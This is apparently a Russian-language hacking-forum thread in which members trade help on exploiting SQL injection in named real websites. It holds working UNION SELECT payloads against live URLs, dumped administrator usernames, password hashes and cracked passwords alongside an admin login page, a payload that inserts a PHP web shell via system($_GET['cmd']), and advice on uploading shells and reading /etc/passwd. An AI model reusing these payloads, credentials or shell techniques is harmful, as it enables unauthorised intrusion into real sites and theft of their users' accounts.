Помощь Sql Иньекции.
 

ссыки? Блин, Кэш, глаза чуть не сломал пока читал месадж, исправь ошибки, не в обиду

ЗЫ

__http://prod1.cmj.com/articles/display_article.php?id=6547215'


16 колонок, вывод не осилил

Ошибки разные, отсюда делаю вывод что юнион должен работать, иначе бы типы данных игнорились:

Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.

нужно использовать convert/aes_decrypt?

cast(TABLE as nvarchar)
cast(TABLE as int)

http://forum.pacan.net/kb.php?mode=cat&cat=23'

Не могу добраться до хэшей админа. Пхпбб.

Помогите заюзать найденный SQL-inj
 

http://portal.migtel.ru/modules.php?name=Search
Если в поле поиска забито что-товроде 99' скрипт выдаёт явную ошибку. Из префиксов видно что cms - Nuke.
Помогите составить запрос для вытаскивания хэша админа.

а теперь признайтесь ктио туда троянца залил

офтоп
Тоже вот не хотелось новую тему создавать.
офтоп
На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users (post запросе) дайет вот такой ответ:Microsoft JET Database Engine ошибка '80040e14'.
В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов (повторил слово в слово!). Ну короче неправельно выбрано кол. столбцов, насколько я понял из
MS.Press.MCAD.MCSE.MCDB - TOPом и задается кол. столбцов,тока сколька не cтавил TOP, все равно ему мало:),короче не правильный запросик, подскажите че нибудь.
Да насчет INFORMATION_SCHEMA.TABLES в запросе - говорит что "таблицы таблиц" нету.

жесть :D :D :D :D
0_о в MSSQL нет оператора UNION

Spyder
Бред есть.

AkyHa_MaTaTa
JET Database работает на драйверах. SQL INJ ты тут не проведешь.

да я сам долго смеялся:)
Может я в чем то и ощибаюсь, but:

in first: Если бы не было такого оператора MSиха послала бы куда подальше.

in second: Загляни вот сюда:http://injection.rulezz.ru/MSSQL-ASP-Injection.html

and last: почитай ман от мелкомягких: MS.Press.MCAD.MCSE.MCDB(правда на инглише).

Извините за оффтопик. Но если на сайте с дырой включен MagicQuotes? Как же тогда шелл залить, into outfile ведь не работает.. А етс/пассвд безполезно расшифровывать, пароли сложные..

там нет паролей

А вот и не прав. В Linux на основе ядер 2.2.x и более ранних они хранились в /etc/passwd, а файла /etc/shadow ещё не было. Хотя сейчас такие встретить очень сложно. Да и алгоритм шифрования там не такой уж и надёжный =)))

Помощь Sql Иньекции.
 

http://rabota.crimea.ua/agency.php?id=-1%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,VERSION()/*
дальше чето не выходит:)(опыта маловата), там еще magic
включено

http://rabota.crimea.ua/agency.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat(username,0x3a,password)+fro m+forum_user/*

admin:f4773bcafa963af10487caa726a47458:xm|

md5 с солью

2InferNo23 - спасибоо!!! +
Там на форуме вобла 3.6.5 вроде стоит.
Может я немного в танке: xm| - salt, или это просто хm|
если просто xm, то можна ли из скуля достать salt?
Неохота зря брутить:) если xm| не salt.
Еще раз пасибо.

да я таки в танке:):http://rabota.crimea.ua/agency.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 %20,16,17,18,19,20,concat(username,0x3a,password,0 x3a,salt)+from+forum_user/*

Неа... Должны быть.. Там 9 хэшей есть. А шадов вообще нету похоже. Там OpenBSD стоит, шифромание Blowfish. Мне хотя бы скрипты посмотреть, но пути на сайте типа сайт/search/ или сайт/news/ Не понятно, что там Index.php не подходит и html тоже и просто search.php и news.php... Знать бы куда там апач установлен, может файл конфигурации подсмотреть тогда получится... Может кто посоветует, какие важные файлы можно еще почитать там..

Здраствуйте!
Да бы не создавать новую тему ..задам вопрос тут))
Столкнулся с проведением скуль инькции в PostgreSQL
Есть маса вопросов...прочитал статью Spyder'a и остались непонятные нюансы!
Короче подобрал столбцыпри подстановке числа появляется чистый
экран и на месте наверное где должно быть число видно только(.....)-троеточие!Так же само и с выводом таблиц ...они выводятся только ввиде (....) как сделать чтобы их было видно????
Извиняюсь за может не корректный вопросенг но очень надо спс за ранее !=))
Может функциею to_char(числа) только не пойму как?

Неудивительно.
url дай.

To ShadOS
Они и сейчас там могут храниться, даже с ядром 2.6.x
;)

Url не дам бикоз на очень популярном сайте=))
Пока нехочу палится и всетаки можно что нить зделать с этим???

Ну лан здесь мне ничего не должен ))
Ну хотябы к примеру можно было сказать что да как =\

Так я читал ...хоть скажите можно то эти таблицы на экран вывести?

У меня тогда еще один маленький вопрос по поводу SQLInjection:
Есть скрипт, которому передается параметр - имя php-файла, которое берется из директории на сайте: site.ru/dir/
Можно ли как-то запустить с помощью этого удаленный сценарий? При том, что magic quotes включены и залить в эту самую директорию, как и в любую другую ничего нельзя...

немного не там, но:
это вывод

подобрал таблицу 'admins'

логин:пасс одного из админов
остальных перебираем лимитом
mysql4-hash, перебор passwordspro или другими тулзами, удачи.

админка: _http://cards.tut.by/admin/login.php

//upd:
2e782c85379a326e = 12345
773359240eb9a1d9 = 123
нужно расшифровать #1 (:

только не пойму причем тут sql-injection... похоже на php-include, хотя...
ты порбовал подставлять вместо этих значений левые?
например:
а вообще учи php и читай https://forum.antichat.ru/thread6296.html

2 Lancellot, скинь ссылку мне в ПМ или в аську постучи =\

Зачем? можно просто добавить пользователя к хосту и все!
zettich|123 добавить админа
vitovt|12345 админ на форуме http://forums.tut.by
можно залить шелл через форум и все! А того удалить.
Сорри за оффтоп

извинити за оффтоп но не понятно для чего сделана тема ведь в Sql Инъекции происходит тоже самое?

http://israblog.nana.co.il/blogread.asp?blog=-1'gh читал дето что еси возрощяет пустую страницу это может означать что скл иньекция там есть... как вы думаете есть там чтото или нет?

Помогите найти скулю http://rudtp.ru/icc.php?id=1'

Help!
Есть инекция Как записать в таблицу users, в поле name И еще. Вот так не прокатывает. На сервере magic_ковычки=on
Непрокатывает последний char().

http://anime.megalan.ru/lite/index.php?cat=animation&mode=show_anime&id=-1;insert into news (bla-bla-bla, ..., name, ..., bla-bla-bla) values('bla-bla-bla',...,'<? system($_GET["cmd"])?>', ..., 'bla-bla-bla');

Попробуй.

В папку должна быть запись разрешена.

Доступ к папке здесь непричем. Тока что прочитал гдето что select "чтото" into outfile char("чтото") не прокатит. Типа особенность этой конструкции. Обязательно into outfile '/home/shell.php'. Без ковычек здесь не обойдешся... ((

wizmo
http://forum.antichat.ru/threadnav34338-1-10.html

http://www.nix.ru/dealers/howtofindus.html?key=1'+UNION+SELECT+1,1,1,3,3,3,3 ,3,3,3,3/*

обтрахался. как залить шелл? на форуме пасс от админа раскриптовал, хотя доступ к админке закрыт htaccess ом. нарыл в базе многа инфы.. безполезной.
*база с форумом phpbb2 если что, префикс phpbb_

версия mysql 5